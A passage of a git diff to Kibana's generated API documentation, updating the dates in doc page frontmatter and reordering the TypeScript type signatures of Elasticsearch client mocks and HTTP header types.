/kibana-dev-docs/api/kbn-core-config-server-internal title: "@kbn/core-config-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-config-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-config-server-internal'] --- import kbnCoreConfigServerInternalObj from './kbn_core_config_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_deprecations_browser.mdx b/api_docs/kbn_core_deprecations_browser.mdx index 8d98e0f06ef9f..586f218db8cb2 100644 --- a/api_docs/kbn_core_deprecations_browser.mdx +++ b/api_docs/kbn_core_deprecations_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-deprecations-browser title: "@kbn/core-deprecations-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-deprecations-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-deprecations-browser'] --- import kbnCoreDeprecationsBrowserObj from './kbn_core_deprecations_browser.devdocs.json'; diff --git a/api_docs/kbn_core_deprecations_browser_internal.mdx b/api_docs/kbn_core_deprecations_browser_internal.mdx index d36809d599395..c2070bd69783c 100644 --- a/api_docs/kbn_core_deprecations_browser_internal.mdx +++ b/api_docs/kbn_core_deprecations_browser_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-deprecations-browser-internal title: "@kbn/core-deprecations-browser-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-deprecations-browser-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-deprecations-browser-internal'] --- import kbnCoreDeprecationsBrowserInternalObj from './kbn_core_deprecations_browser_internal.devdocs.json'; diff --git a/api_docs/kbn_core_deprecations_browser_mocks.mdx b/api_docs/kbn_core_deprecations_browser_mocks.mdx index 3836e2a3c4dc2..c33996b0cd08c 100644 --- a/api_docs/kbn_core_deprecations_browser_mocks.mdx +++ b/api_docs/kbn_core_deprecations_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-deprecations-browser-mocks title: "@kbn/core-deprecations-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-deprecations-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-deprecations-browser-mocks'] --- import kbnCoreDeprecationsBrowserMocksObj from './kbn_core_deprecations_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_deprecations_common.mdx b/api_docs/kbn_core_deprecations_common.mdx index c5d1188e1f972..ca14a3ee03531 100644 --- a/api_docs/kbn_core_deprecations_common.mdx +++ b/api_docs/kbn_core_deprecations_common.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-deprecations-common title: "@kbn/core-deprecations-common" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-deprecations-common plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-deprecations-common'] --- import kbnCoreDeprecationsCommonObj from './kbn_core_deprecations_common.devdocs.json'; diff --git a/api_docs/kbn_core_doc_links_browser.mdx b/api_docs/kbn_core_doc_links_browser.mdx index 79a06bbdf3eb4..633572d172590 100644 --- a/api_docs/kbn_core_doc_links_browser.mdx +++ b/api_docs/kbn_core_doc_links_browser.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-doc-links-browser title: "@kbn/core-doc-links-browser" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-doc-links-browser plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-doc-links-browser'] --- import kbnCoreDocLinksBrowserObj from './kbn_core_doc_links_browser.devdocs.json'; diff --git a/api_docs/kbn_core_doc_links_browser_mocks.mdx b/api_docs/kbn_core_doc_links_browser_mocks.mdx index 022cde2f67980..35bbc3ea97f00 100644 --- a/api_docs/kbn_core_doc_links_browser_mocks.mdx +++ b/api_docs/kbn_core_doc_links_browser_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-doc-links-browser-mocks title: "@kbn/core-doc-links-browser-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-doc-links-browser-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-doc-links-browser-mocks'] --- import kbnCoreDocLinksBrowserMocksObj from './kbn_core_doc_links_browser_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_doc_links_server.mdx b/api_docs/kbn_core_doc_links_server.mdx index 7d12c289a1e94..31017f33339e8 100644 --- a/api_docs/kbn_core_doc_links_server.mdx +++ b/api_docs/kbn_core_doc_links_server.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-doc-links-server title: "@kbn/core-doc-links-server" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-doc-links-server plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-doc-links-server'] --- import kbnCoreDocLinksServerObj from './kbn_core_doc_links_server.devdocs.json'; diff --git a/api_docs/kbn_core_doc_links_server_mocks.mdx b/api_docs/kbn_core_doc_links_server_mocks.mdx index d5c7d570f7f94..45b359195c1ad 100644 --- a/api_docs/kbn_core_doc_links_server_mocks.mdx +++ b/api_docs/kbn_core_doc_links_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-doc-links-server-mocks title: "@kbn/core-doc-links-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-doc-links-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-doc-links-server-mocks'] --- import kbnCoreDocLinksServerMocksObj from './kbn_core_doc_links_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_elasticsearch_client_server_internal.mdx b/api_docs/kbn_core_elasticsearch_client_server_internal.mdx index c5f1e5a324710..3c07c5a4b319f 100644 --- a/api_docs/kbn_core_elasticsearch_client_server_internal.mdx +++ b/api_docs/kbn_core_elasticsearch_client_server_internal.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-elasticsearch-client-server-internal title: "@kbn/core-elasticsearch-client-server-internal" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-elasticsearch-client-server-internal plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-elasticsearch-client-server-internal'] --- import kbnCoreElasticsearchClientServerInternalObj from './kbn_core_elasticsearch_client_server_internal.devdocs.json'; diff --git a/api_docs/kbn_core_elasticsearch_client_server_mocks.devdocs.json b/api_docs/kbn_core_elasticsearch_client_server_mocks.devdocs.json index e5f0d93daf2c9..ebe913276adcb 100644 --- a/api_docs/kbn_core_elasticsearch_client_server_mocks.devdocs.json +++ b/api_docs/kbn_core_elasticsearch_client_server_mocks.devdocs.json @@ -225,17 +225,23 @@ "label": "asInternalUser", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.DeeplyMockedApi", - "text": "DeeplyMockedApi" + "section": "def-server.ClientApiMockInstance", + "text": "ClientApiMockInstance" }, - "<", - "default", - ">; search: ", + ">, [params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined]>; delete: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -244,12 +250,12 @@ "text": "ClientApiMockInstance" }, ">, [params?: ", - "SearchRequest", + "WriteResponseBase", + ">, [params: ", + "DeleteRequest", " | ", - "SearchRequest", - " | undefined, options?: ", + "DeleteRequest", + ", options?: ", "TransportRequestOptions", " | undefined]>; cluster: ", { @@ -271,7 +277,23 @@ }, "<", "default", - ">; create: ", + ">; search: ", + { + "pluginId": "@kbn/core-elasticsearch-client-server-mocks", + "scope": "server", + "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", + "section": "def-server.ClientApiMockInstance", + "text": "ClientApiMockInstance" + }, + ">, [params?: ", + "SearchRequest", + " | ", + "SearchRequest", + " | undefined, options?: ", + "TransportRequestOptions", + " | undefined]>; create: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -307,7 +329,7 @@ }, "<", "default", - ">; index: ", + ">; name: string | symbol; index: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -323,22 +345,6 @@ "IndexRequest", ", options?: ", "TransportRequestOptions", - " | undefined]>; get: ", - { - "pluginId": "@kbn/core-elasticsearch-client-server-mocks", - "scope": "server", - "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.ClientApiMockInstance", - "text": "ClientApiMockInstance" - }, - ">, [params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", " | undefined]>; update: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", @@ -355,22 +361,6 @@ "UpdateRequest", ", options?: ", "TransportRequestOptions", - " | undefined]>; delete: ", - { - "pluginId": "@kbn/core-elasticsearch-client-server-mocks", - "scope": "server", - "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.ClientApiMockInstance", - "text": "ClientApiMockInstance" - }, - ", [params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", " | undefined]>; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", @@ -1223,6 +1213,16 @@ }, "<", "default", + ">; transform: ", + { + "pluginId": "@kbn/core-elasticsearch-client-server-mocks", + "scope": "server", + "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", + "section": "def-server.DeeplyMockedApi", + "text": "DeeplyMockedApi" + }, + "<", + "default", ">; updateByQuery: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", @@ -1333,17 +1333,23 @@ "label": "asInternalUser", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.DeeplyMockedApi", - "text": "DeeplyMockedApi" + "section": "def-server.ClientApiMockInstance", + "text": "ClientApiMockInstance" }, - "<", - "default", - ">; search: ", + ">, [params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined]>; delete: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -1352,12 +1358,12 @@ "text": "ClientApiMockInstance" }, ">, [params?: ", - "SearchRequest", + "WriteResponseBase", + ">, [params: ", + "DeleteRequest", " | ", - "SearchRequest", - " | undefined, options?: ", + "DeleteRequest", + ", options?: ", "TransportRequestOptions", " | undefined]>; cluster: ", { @@ -1379,7 +1385,23 @@ }, "<", "default", - ">; create: ", + ">; search: ", + { + "pluginId": "@kbn/core-elasticsearch-client-server-mocks", + "scope": "server", + "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", + "section": "def-server.ClientApiMockInstance", + "text": "ClientApiMockInstance" + }, + ">, [params?: ", + "SearchRequest", + " | ", + "SearchRequest", + " | undefined, options?: ", + "TransportRequestOptions", + " | undefined]>; create: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -1415,7 +1437,7 @@ }, "<", "default", - ">; index: ", + ">; name: string | symbol; index: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -1431,22 +1453,6 @@ "IndexRequest", ", options?: ", "TransportRequestOptions", - " | undefined]>; get: ", - { - "pluginId": "@kbn/core-elasticsearch-client-server-mocks", - "scope": "server", - "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.ClientApiMockInstance", - "text": "ClientApiMockInstance" - }, - ">, [params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", " | undefined]>; update: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", @@ -1463,22 +1469,6 @@ "UpdateRequest", ", options?: ", "TransportRequestOptions", - " | undefined]>; delete: ", - { - "pluginId": "@kbn/core-elasticsearch-client-server-mocks", - "scope": "server", - "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.ClientApiMockInstance", - "text": "ClientApiMockInstance" - }, - ", [params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", " | undefined]>; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", @@ -2331,6 +2321,16 @@ }, "<", "default", + ">; transform: ", + { + "pluginId": "@kbn/core-elasticsearch-client-server-mocks", + "scope": "server", + "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", + "section": "def-server.DeeplyMockedApi", + "text": "DeeplyMockedApi" + }, + "<", + "default", ">; updateByQuery: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", @@ -2397,17 +2397,23 @@ "label": "asCurrentUser", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.DeeplyMockedApi", - "text": "DeeplyMockedApi" + "section": "def-server.ClientApiMockInstance", + "text": "ClientApiMockInstance" }, - "<", - "default", - ">; search: ", + ">, [params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined]>; delete: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -2416,12 +2422,12 @@ "text": "ClientApiMockInstance" }, ">, [params?: ", - "SearchRequest", + "WriteResponseBase", + ">, [params: ", + "DeleteRequest", " | ", - "SearchRequest", - " | undefined, options?: ", + "DeleteRequest", + ", options?: ", "TransportRequestOptions", " | undefined]>; cluster: ", { @@ -2443,7 +2449,23 @@ }, "<", "default", - ">; create: ", + ">; search: ", + { + "pluginId": "@kbn/core-elasticsearch-client-server-mocks", + "scope": "server", + "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", + "section": "def-server.ClientApiMockInstance", + "text": "ClientApiMockInstance" + }, + ">, [params?: ", + "SearchRequest", + " | ", + "SearchRequest", + " | undefined, options?: ", + "TransportRequestOptions", + " | undefined]>; create: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -2479,7 +2501,7 @@ }, "<", "default", - ">; index: ", + ">; name: string | symbol; index: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -2495,22 +2517,6 @@ "IndexRequest", ", options?: ", "TransportRequestOptions", - " | undefined]>; get: ", - { - "pluginId": "@kbn/core-elasticsearch-client-server-mocks", - "scope": "server", - "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.ClientApiMockInstance", - "text": "ClientApiMockInstance" - }, - ">, [params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", " | undefined]>; update: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", @@ -2527,22 +2533,6 @@ "UpdateRequest", ", options?: ", "TransportRequestOptions", - " | undefined]>; delete: ", - { - "pluginId": "@kbn/core-elasticsearch-client-server-mocks", - "scope": "server", - "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.ClientApiMockInstance", - "text": "ClientApiMockInstance" - }, - ", [params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", " | undefined]>; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", @@ -3395,6 +3385,16 @@ }, "<", "default", + ">; transform: ", + { + "pluginId": "@kbn/core-elasticsearch-client-server-mocks", + "scope": "server", + "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", + "section": "def-server.DeeplyMockedApi", + "text": "DeeplyMockedApi" + }, + "<", + "default", ">; updateByQuery: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", @@ -3526,17 +3526,23 @@ "label": "ElasticsearchClientMock", "description": [], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.DeeplyMockedApi", - "text": "DeeplyMockedApi" + "section": "def-server.ClientApiMockInstance", + "text": "ClientApiMockInstance" }, - "<", - "default", - ">; search: ", + ">, [params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptions", + " | undefined]>; delete: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -3545,12 +3551,12 @@ "text": "ClientApiMockInstance" }, ">, [params?: ", - "SearchRequest", + "WriteResponseBase", + ">, [params: ", + "DeleteRequest", " | ", - "SearchRequest", - " | undefined, options?: ", + "DeleteRequest", + ", options?: ", "TransportRequestOptions", " | undefined]>; cluster: ", { @@ -3572,7 +3578,23 @@ }, "<", "default", - ">; create: ", + ">; search: ", + { + "pluginId": "@kbn/core-elasticsearch-client-server-mocks", + "scope": "server", + "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", + "section": "def-server.ClientApiMockInstance", + "text": "ClientApiMockInstance" + }, + ">, [params?: ", + "SearchRequest", + " | ", + "SearchRequest", + " | undefined, options?: ", + "TransportRequestOptions", + " | undefined]>; create: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -3608,7 +3630,7 @@ }, "<", "default", - ">; index: ", + ">; name: string | symbol; index: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", "scope": "server", @@ -3624,22 +3646,6 @@ "IndexRequest", ", options?: ", "TransportRequestOptions", - " | undefined]>; get: ", - { - "pluginId": "@kbn/core-elasticsearch-client-server-mocks", - "scope": "server", - "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.ClientApiMockInstance", - "text": "ClientApiMockInstance" - }, - ">, [params: ", - "GetRequest", - " | ", - "GetRequest", - ", options?: ", - "TransportRequestOptions", " | undefined]>; update: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", @@ -3656,22 +3662,6 @@ "UpdateRequest", ", options?: ", "TransportRequestOptions", - " | undefined]>; delete: ", - { - "pluginId": "@kbn/core-elasticsearch-client-server-mocks", - "scope": "server", - "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", - "section": "def-server.ClientApiMockInstance", - "text": "ClientApiMockInstance" - }, - ", [params: ", - "DeleteRequest", - " | ", - "DeleteRequest", - ", options?: ", - "TransportRequestOptions", " | undefined]>; [kInternal]: symbol | null; [kAsyncSearch]: symbol | null; [kAutoscaling]: symbol | null; [kCat]: symbol | null; [kCcr]: symbol | null; [kCluster]: symbol | null; [kDanglingIndices]: symbol | null; [kEnrich]: symbol | null; [kEql]: symbol | null; [kFeatures]: symbol | null; [kFleet]: symbol | null; [kGraph]: symbol | null; [kIlm]: symbol | null; [kIndices]: symbol | null; [kIngest]: symbol | null; [kLicense]: symbol | null; [kLogstash]: symbol | null; [kMigration]: symbol | null; [kMl]: symbol | null; [kMonitoring]: symbol | null; [kNodes]: symbol | null; [kRollup]: symbol | null; [kSearchableSnapshots]: symbol | null; [kSecurity]: symbol | null; [kShutdown]: symbol | null; [kSlm]: symbol | null; [kSnapshot]: symbol | null; [kSql]: symbol | null; [kSsl]: symbol | null; [kTasks]: symbol | null; [kTextStructure]: symbol | null; [kTransform]: symbol | null; [kWatcher]: symbol | null; [kXpack]: symbol | null; transport: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", @@ -4524,6 +4514,16 @@ }, "<", "default", + ">; transform: ", + { + "pluginId": "@kbn/core-elasticsearch-client-server-mocks", + "scope": "server", + "docId": "kibKbnCoreElasticsearchClientServerMocksPluginApi", + "section": "def-server.DeeplyMockedApi", + "text": "DeeplyMockedApi" + }, + "<", + "default", ">; updateByQuery: ", { "pluginId": "@kbn/core-elasticsearch-client-server-mocks", diff --git a/api_docs/kbn_core_elasticsearch_client_server_mocks.mdx b/api_docs/kbn_core_elasticsearch_client_server_mocks.mdx index 22bf78ceaea6e..1ec4cd545d56b 100644 --- a/api_docs/kbn_core_elasticsearch_client_server_mocks.mdx +++ b/api_docs/kbn_core_elasticsearch_client_server_mocks.mdx @@ -8,7 +8,7 @@ slug: /kibana-dev-docs/api/kbn-core-elasticsearch-client-server-mocks title: "@kbn/core-elasticsearch-client-server-mocks" image: https://source.unsplash.com/400x175/?github description: API docs for the @kbn/core-elasticsearch-client-server-mocks plugin -date: 2022-08-15 +date: 2022-08-18 tags: ['contributor', 'dev', 'apidocs', 'kibana', '@kbn/core-elasticsearch-client-server-mocks'] --- import kbnCoreElasticsearchClientServerMocksObj from './kbn_core_elasticsearch_client_server_mocks.devdocs.json'; diff --git a/api_docs/kbn_core_elasticsearch_server.devdocs.json b/api_docs/kbn_core_elasticsearch_server.devdocs.json index 331ea6389ce5d..71b802e242b1a 100644 --- a/api_docs/kbn_core_elasticsearch_server.devdocs.json +++ b/api_docs/kbn_core_elasticsearch_server.devdocs.json @@ -800,7 +800,7 @@ "Headers used for authentication against Elasticsearch" ], "signature": [ - "{ from?: string | string[] | undefined; origin?: string | string[] | undefined; warning?: string | string[] | undefined; location?: string | string[] | undefined; date?: string | string[] | undefined; expires?: string | string[] | undefined; range?: string | string[] | undefined; allow?: string | string[] | undefined; accept?: string | string[] | undefined; host?: string | string[] | undefined; etag?: string | string[] | undefined; authorization?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: string | string[] | undefined; age?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; expect?: string | string[] | undefined; forwarded?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" + "{ accept?: string | string[] | undefined; \"accept-language\"?: string | string[] | undefined; \"accept-patch\"?: string | string[] | undefined; \"accept-ranges\"?: string | string[] | undefined; \"access-control-allow-credentials\"?: string | string[] | undefined; \"access-control-allow-headers\"?: string | string[] | undefined; \"access-control-allow-methods\"?: string | string[] | undefined; \"access-control-allow-origin\"?: string | string[] | undefined; \"access-control-expose-headers\"?: string | string[] | undefined; \"access-control-max-age\"?: string | string[] | undefined; \"access-control-request-headers\"?: string | string[] | undefined; \"access-control-request-method\"?: string | string[] | undefined; age?: string | string[] | undefined; allow?: string | string[] | undefined; \"alt-svc\"?: string | string[] | undefined; authorization?: string | string[] | undefined; \"cache-control\"?: string | string[] | undefined; connection?: string | string[] | undefined; \"content-disposition\"?: string | string[] | undefined; \"content-encoding\"?: string | string[] | undefined; \"content-language\"?: string | string[] | undefined; \"content-length\"?: string | string[] | undefined; \"content-location\"?: string | string[] | undefined; \"content-range\"?: string | string[] | undefined; \"content-type\"?: string | string[] | undefined; cookie?: string | string[] | undefined; date?: string | string[] | undefined; etag?: string | string[] | undefined; expect?: string | string[] | undefined; expires?: string | string[] | undefined; forwarded?: string | string[] | undefined; from?: string | string[] | undefined; host?: string | string[] | undefined; \"if-match\"?: string | string[] | undefined; \"if-modified-since\"?: string | string[] | undefined; \"if-none-match\"?: string | string[] | undefined; \"if-unmodified-since\"?: string | string[] | undefined; \"last-modified\"?: string | string[] | undefined; location?: string | string[] | undefined; origin?: string | string[] | undefined; pragma?: string | string[] | undefined; \"proxy-authenticate\"?: string | string[] | undefined; \"proxy-authorization\"?: string | string[] | undefined; \"public-key-pins\"?: string | string[] | undefined; range?: string | string[] | undefined; referer?: string | string[] | undefined; \"retry-after\"?: string | string[] | undefined; \"sec-websocket-accept\"?: string | string[] | undefined; \"sec-websocket-extensions\"?: string | string[] | undefined; \"sec-websocket-key\"?: string | string[] | undefined; \"sec-websocket-protocol\"?: string | string[] | undefined; \"sec-websocket-version\"?: string | string[] | undefined; \"set-cookie\"?: string | string[] | undefined; \"strict-transport-security\"?: string | string[] | undefined; tk?: string | string[] | undefined; trailer?: string | string[] | undefined; \"transfer-encoding\"?: string | string[] | undefined; upgrade?: string | string[] | undefined; \"user-agent\"?: string | string[] | undefined; vary?: string | string[] | undefined; via?: string | string[] | undefined; warning?: string | string[] | undefined; \"www-authenticate\"?: string | string[] | undefined; } & { [header: string]: string | string[] | undefined; }" ], "path": "packages/core/elasticsearch/core-elasticsearch-server/src/client/scopeable_request.ts", "deprecated": false @@ -830,7 +830,61 @@ "\nA {@link ElasticsearchClient | client} to be used to query the ES cluster on behalf of the Kibana internal user" ], "signature": [ - "{ name: string | symbol; transform: ", + "{ get: { (this: That, params: ", + "GetRequest", + " | ", + "GetRequest", + ", options?: ", + "TransportRequestOptionsWithOutMeta", + " | undefined): Promise<", + "GetResponse", + ">; (this: That, params: ", + 